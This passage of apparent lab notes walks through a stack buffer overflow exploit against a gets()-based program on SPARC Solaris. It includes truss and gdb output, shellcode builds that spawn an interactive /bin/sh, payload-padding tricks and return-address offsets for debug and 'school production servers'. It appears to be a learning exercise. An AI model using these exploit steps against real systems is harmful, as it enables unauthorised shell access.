0xFFBEFDD8) = 0 sigaction(SIGHUP, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGINT, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGINT, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGQUIT, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGQUIT, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGILL, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGILL, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGTRAP, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGTRAP, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGABRT, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGABRT, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGEMT, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGEMT, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGFPE, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGFPE, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGBUS, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGBUS, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGSEGV, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGSYS, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGSYS, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGPIPE, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGPIPE, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGALRM, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGALRM, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGTERM, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGTERM, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGUSR1, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGUSR1, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGUSR2, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGUSR2, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGPWR, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGPWR, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGURG, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGURG, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGPOLL, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGPOLL, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGVTALRM, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGVTALRM, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGPROF, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGPROF, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGXCPU, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGXFSZ, 0x00000000, 0xFFBEFDD8) = 0 sigaction(SIGRTMIN, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGRTMIN+1, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGRTMIN+2, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGRTMIN+3, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGRTMAX-3, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGRTMAX-2, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGRTMAX-1, 0xFFBEFD38, 0xFFBEFDB8) = 0 sigaction(SIGRTMAX, 0xFFBEFD38, 0xFFBEFDB8) = 0 getuid() = 100 [100] getuid() = 100 [100] getgid() = 10 [10] getgid() = 10 [10] getuid() = 100 [100] ioctl(0, TCGETS, 0x000391B0) Err#25 ENOTTY $ write(2, " $ ", 2) = 2 read(0, 0x000394D0, 128) = 0 fcntl(0, F_GETFL, 0x00000000) = 8192 fstat64(0, 0xFFBEFC28) = 0 ioctl(0, TCGETA, 0xFFBEFD7C) Err#25 ENOTTY close(0) = 0 llseek(0, 0, SEEK_CUR) Err#9 EBADF _exit(0) -bash-4.3$
I finally start to put 2 and 2 together…
$PWD/invoke2 v < payload
The above snippet was the problem.. Since I was piping from the file.. when the shell gets spawned it’s just like;; “I GUESS IM FINISHED HERE.. EOF”..
Here’s my temporary happiness inspired from http://stackoverflow.com/questions/8509045/execve-bin-sh-0-0-in-a-pipe
Here’s a temporary solution
the beauty of raw tty (you may have to hit enter once at the beginning and again after doing an ‘exit’:
Notes
The difference between invoking /bin/sh -i and simply only /bin/bash is that -i adds automatically the $ prompt. I could not find a way to set the prompt manually when only using /bin/sh thru cat without -i.
Here’s an example of the exploit running, which it does an execve /bin/sh -i
# anything enclosed in [] is note from me added after execution -bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin -bash-4.3$ (cat payload; cat) | $PWD/invoke2 v sp = 0xffbefdb8 [hangs here until you hit enter key, probably an incident of using cat and cooked input] $ ls alternating_payload2 asmshell2.bin exec payload3 v2 alternating_payload2.c asmshell3.bin howto_a_payload payload_asmshell6 v2.c alternating_payload3 asmshell4.bin invoke2 payload_fix_fp write_raw.bin alternating_payload3.c asmshell5_interactive.bin ksh_shellcode payload_trashed_fp asm asmshell6.bin magic_crash_length readme.txt asm_tcsh.bin build_shellcode_steps payload v asmshell.bin core payload2 v.c $ exit [hangs here until you hit enter key again, probably an incident of using cat and cooked input] -bash-4.3$
Figure out how much space there is until overflow into Libc (that’s bad)
(gdb) q -bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin; ./alternating_payload2 1024 >> payload; printf "\x00" >> payload -bash-4.3$ $PWD/invoke2 -d v GNU gdb 6.6 Copyright (C) 2006 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-sun-solaris2.8"... (gdb) b 16 Breakpoint 1 at 0x10750: file v.c, line 16. (gdb) r < payload Starting program: /home/bazz/latest/v < payload warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1" sp = 0xffbefda0 Program received signal SIGSEGV, Segmentation fault. 0xff2c3064 in memccpy () from /usr/lib/libc.so.1 (gdb)
Only logical explanation is that the buffer needs to be shortened. It must be overwriting libc, or some SUPER out of bounds area… maybe completely went off the charts.. IONNO I try to understand it but it isn’t working so I just cut the buffer down. Actually I just learned. using pmap tools and trialing the buffer size, the fact is that the stack is allocated 8K from FFBEE000 8K read/write/exec [ stack ]
FFBEE000 + 8k (0x2000) = 0xFFBF0000
which is past the page boundary..
(gdb) 0xffbeff80: 0x03424242 0x03434343 0x03444444 0x03454545 0xffbeff90: 0x03464646 0x03474747 0x03484848 0x03494949 0xffbeffa0: 0x034a4a4a 0x034b4b4b 0x034c4c4c 0x034d4d4d 0xffbeffb0: 0x034e4e4e 0x034f4f4f 0x03505050 0x03515151 0xffbeffc0: 0x03525252 0x03535353 0x03545454 0x03555555 0xffbeffd0: 0x03565656 0x03575757 0x03585858 0x03595959 0xffbeffe0: 0x035a5a5a 0x04414141 0x04424242 0x04434343 0xffbefff0: 0x04444444 0x04454545 (gdb) 0xffbefff8: 0x04464646 0x04470000 Cannot access memory at address 0xffbf0000 (gdb)
NOTE!! When exploiting gets(), it is IMPERTINENT to use a 0x0a rather than null byte. is it the leading role in string termination.. I didn’t do that above and it led to hairy things.. I had to hit enter myself causing a \r\n which is why the last 2 bytes are 0000, that was space needed for \r\n I assume.. you can rid this by using 0x0a in your buffer.
in the scheme of exploiting apply, the program can be spawned an unlimited number of times.
To get really sweet, it’s time to open our own TTY to “write” our shellcode through and eventually our own terminal to directly operate with the shell on the other end :)
$18 byte difference between debug and production return address offset. This difference does not exist on school production servers.
i.e.
e50 # debug return address – 8
e68 # production return address – 8
To-Do:
Add in a sweet nop-slide
Then find a suitable backoff limit, and fill with nops